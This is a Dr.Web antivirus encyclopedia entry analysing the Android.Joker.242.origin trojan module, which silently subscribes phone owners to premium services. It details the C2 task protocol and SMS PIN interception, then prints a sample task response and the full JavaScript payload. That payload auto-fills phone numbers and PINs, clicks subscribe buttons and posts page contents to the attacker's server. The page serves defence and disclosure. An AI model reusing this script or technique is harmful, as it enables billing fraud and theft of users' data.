Protégez votre univers

Nos autres ressources

  • free.drweb.fr — utilitaires gratuits, plugins, widgets
  • av-desk.com — service Internet pour les prestataires de services Dr.Web AV-Desk
  • curenet.drweb.com — l'utilitaire de désinfection réseau Dr.Web CureNet!
Fermer

Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Android.Joker.242.origin

Added to the Dr.Web virus database: 2021-01-27

Virus description added:

Description

A malicious software from the Android.Joker family. It represents a module that is downloaded by some other modifications of this family. It performs hidden payments from mobile phone accounts and subscribes victims to paid services. Service activation is performed without any action from the user. To do so, Android.Joker.242.origin covertly loads premium services websites where it imitates the actions of Android device users, automatically clicking on the required menu buttons and entering confirmation codes.

Information about known modifications of the Android.Joker using this module is available in the link to the indicators of compromise at the end of this description.

Operating routine

Android.Joker.242.origin is downloaded and launched through the DexClassLoader class during the operation of the base trojan module. Upon launching, it requests the list of tasks appOfferList located at hxxps://ad[.]mobnv[.]com/prod-api/foreign/app/channel/appOffer/getTask.

Upon request, the following parameters are sent to the server:

  • AppNumber—application ID (set by another module, appid by default)
  • AppVersion—application version
  • OperatorCode—SIM card mobile provider code

Each task consists of the following fields:

  • appCampSuccessKey―contains a string. When the premium service web page is loaded, its URL is checked to contain the specified string; if the string is there, the payment is considered to be successfully completed.
  • appCampHeader―header X-Requested-With, loaded with the task URL.
  • offerId―task ID.
  • js―a JavaScript executed after the targeted web page is loaded in WebView. It is encoded with Base64, and also executed upon receiving the notification with the subscription confirmation PIN code, which is executed after the landing page has loaded in WebView.
  • appCampTrackUrl―the initial task URL.
  • offShortcode―a string whose presence is checked in the title of a read notification with the payment confirmation PIN code.
  • appCampPinRegex―a regular expression for searching for the payment confirmation PIN code in the text of the notification.
  • appCampLoadWay―a method of loading a task URL into WebView. There are two ways for this in the analyzed sample:
    1. directly loading the page into WebView
    2. following the link using a GET request, then following the link from the Location field or refresh header of the response and so on, until it becomes a link without these headers. This link will be loaded into WebView.
  • offerName―task name.

In addition to the task list, the server response contains the list of strings errorPool. URLs of targeted websites loaded into WebView are verified to contain these strings. If any of them are present in the web address, the task execution is stopped and the trojan proceeds to the next one.

Payment processing

In order for the payment to be successful, the infected device must be connected to the mobile internet. If the connection is different, Android.Joker.242.origin attempts to turn off the active Wi-Fi connection, using android.net.wifi.WifiManager. However, the trojan can only do this on devises running Android OS versions below 10.

Next, for each task, the NovaSdkView component containing android.webkit.WebView (a WebView object) is created sequentially with short time intervals. An assigned URL is then loaded into this WebView, using one of the methods given above (appCampLoadWay parameter).

Once the web page is loaded, the JavaScript received from the server is then loaded. In this code, the @@@@ string is replaced by a victim’s phone number prior to the loading. With that, the number itself is read from SharedPreferences where it must be saved by the base trojan module.

The base trojan module intercepts notifications about incoming SMS and sends the intent with the action="SEND_APP_NOTIFICATION_ACTION" field. This intent contains the notification’s title and text. In turn, Android.Joker.242.origin receives the intent through the broadcast receiver and, using the regular expression, searches for the PIN code in the notification’s text. The successfully obtained PIN is then added into the JavaScript instead of ####, and the script is then executed. With that, the Android.Joker.242.origin module not only searches for the confirmation codes, but also logs all received notifications about SMS and sends this information to hxxps://ad[.]mobnv[.]com, which can lead to a confidential data leak.

The URLs of the targeted websites loaded into WebView are checked to contain the appCampSuccessKey string. . Its presence is interpreted as a successful payment, while the presence of the strings from the errorPool list is interpreted as an error. In both cases, Android.Joker.242.origin proceeds to execute the next task.

The tasks from the list for processing payments are executed one after another. With that, there is a designed limitation subscribeLimit for the number of successfully completed payments for a single user. This limitation is read from SharedPreferences where it’s recorded by another module. By default, it is 5 payments, but it can be changed up or down.

Task example:

hxxps://app[.]mobnv[.]com/prod-api/foreign/app/channel/appOffer/getTask?appNumber=201028120701&appVersion=0.1.0&operatorCode=42006&offset=0&limit=50
 
{
   "errorPool":"failed,error",
   "appOfferList":[
      {
         "appCampHeader":"",
         "appCampLoadWay":"2",
         "appCampPinRegex":"\\b\\d{6}\\b|\\b\\d{4}\\b",
         "appCampSuccessKey":"",
         "appCampTrackUrl":"hxxps://app[.]mobnv[.]com/prod-api/foreign/app/tl/26091?clickid={clickid}",
         "js":"ZnVuY3R...9Cn0=",
         "offShortcode":"",
         "offerId":1865,
         "offerName":"SA-Musify-All-PIN-4235-Mobily"
      },
      {
         "appCampHeader":"",
         "appCampLoadWay":"1",
         "appCampPinRegex":"\\b\\d{6}\\b|\\b\\d{4}\\b",
         "appCampSuccessKey":"",
         "appCampTrackUrl":"hxxps://app[.]mobnv[.]com/prod-api/foreign/app/tl/26121?clickid={clickid}",
         "js":"ZnVuY3...9Cn0=",
         "offShortcode":"",
         "offerId":1910,
         "offerName":"SA-Insaudi 1-All-PIN-4261-mobily"
      }
   ]
}

An example of JavaScript executed by the trojan:

function doAjax(data) {
    var xhr = null;
    if (window.XMLHttpRequest) {
        xhr = new XMLHttpRequest()
    } else {
        xhr = new ActiveXObject("Microsoft.XMLHTTP")
    }
    var type = data.type == "get" ? "get" : "post";
    var async = data.type ? true : false;
    xhr.open(type, data.url, async);
    if (type === "post") {
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
    }
    xhr.send(data.data);
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            if (xhr.status == 200) {
                if (typeof data.success == "function") {
                    data.success(xhr.responseText)
                } else {
                    if (typeof data.error == "function") {
                        data.error()
                    }
                }
            }
        }
    }
}
function uploadSource(value) {
    var time = (new Date()).getTime();
    var pageurl = encodeURIComponent(window.location.href);
    var source = "";
    if (null == value || '' == value || 'undefined' == value) {
        source = encodeURIComponent(document.documentElement.outerHTML);
    } else {
        source = value;
    }
    var offerId = 1992;
    var appId = 131;
    var url = "hxxp://www[.]mobnv[.]com/pay/api/userlog/wapsource/";
    var params = "time=" + time + "&url=" + pageurl + "&source=" + source + "&offerid=" + offerId + "&appId=" + appId;
    var data = {
        type: "post",
        url: url,
        data: params,
        async: true,
        success: "alert",
        error: null
    };
    doAjax(data)
}
uploadSource();
if (window.location.href.indexOf("hxxps://cmpgn1[.]sportmob[.]com/landing/bg-ksa-p-vertads25?clickid=") !== -1) {
    var mninput = document.getElementById("number_input");
    var pininput = document.getElementById("code_input");
    var ok = document.getElementsByClassName("form number_confirmation")[0].className;
    if (ok.indexOf("show") == -1) {
        var g = document.getElementsByTagName("label");
        for (var e = 0; e < g.length; e++) {
            g[e].click();
        }
        var phonenumber = "@@@@";
        if (phonenumber !== "" && phonenumber.indexOf("@") === -1) {
            phonenumber = phonenumber.replace("+", "");
            if (phonenumber > 9) {
                phonenumber = phonenumber.substring(phonenumber.length - 9, phonenumber.length);
            }
            mninput.value = "966" + phonenumber;
            document.getElementsByClassName("operator_btn")[0].click();
            setTimeout(function() {
                document.getElementById("subscribe_btn1").click();
                uploadSource(mninput.value + "||" + encodeURIComponent(document.documentElement.outerHTML));
            }, 500);
        }
    } else {
        var pinvalue = "####";
        if (pinvalue !== "" && pinvalue.indexOf("#") === -1) {
            pininput.value = pinvalue;
            setTimeout(function() {
                document.getElementById("subscribe_btn2").click();
                uploadSource(pininput.value + "||" + encodeURIComponent(document.documentElement.outerHTML));
            }, 500);
        }
    }
}

Indicators of compromise

News about the trojan

Recommandations pour le traitement


Android

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile le produit antivirus gratuit Dr.Web для Android Light. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur une violation grave de la loi ou une demande de rançon s’affichent sur l'écran de l'appareil mobile), procédez comme suit :
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil contaminé le produit antivirus gratuit Dr.Web для Android Light et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android

Editeur russe des solutions antivirus Dr.Web
Expérience dans le développement depuis 1992
Les internautes dans plus de 200 pays utilisent Dr.Web
L'antivirus est fourni en tant que service depuis 2007
Support 24/24

Dr.Web © Doctor Web
2003 — 2021

Doctor Web - éditeur russe des solutions antivirus Dr.Web. Doctor Web développe les produits Dr.Web depuis 1992.

333b, Avenue de Colmar, 67100 Strasbourg